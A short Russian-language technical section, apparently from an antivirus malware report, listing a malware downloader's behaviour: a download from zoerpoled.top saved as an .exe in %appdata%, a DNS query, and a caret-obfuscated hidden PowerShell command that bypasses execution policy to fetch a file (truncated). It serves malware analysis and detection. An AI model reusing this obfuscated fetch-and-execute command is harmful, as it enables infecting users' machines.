Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^WeRs^helL.Exe -^e^xecuTIOn^POl^IC^y b^YP^ASs ^-^noPrOF^iLE^ -^w^inDOw^stylE^ HiD^dEN (New^-^O^BJecT SY^sTEM.Net.W^EbC^L^i^e^nT).dOwnLO^AD^Fi^l^e(^'http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^O^WeRs^helL.Exe -^e^xecuTIOn^POl^IC^y b^YP^ASs ^-^noPrOF^iLE^ -^w^inDOw^stylE^ HiD^dEN (New^-^O^BJecT SY^sTEM.Net.W^EbC^L^i^e^nT).dOwnLO^AD^Fi^l^e(^'http://www.zoerpoled....' (со скрытым окном)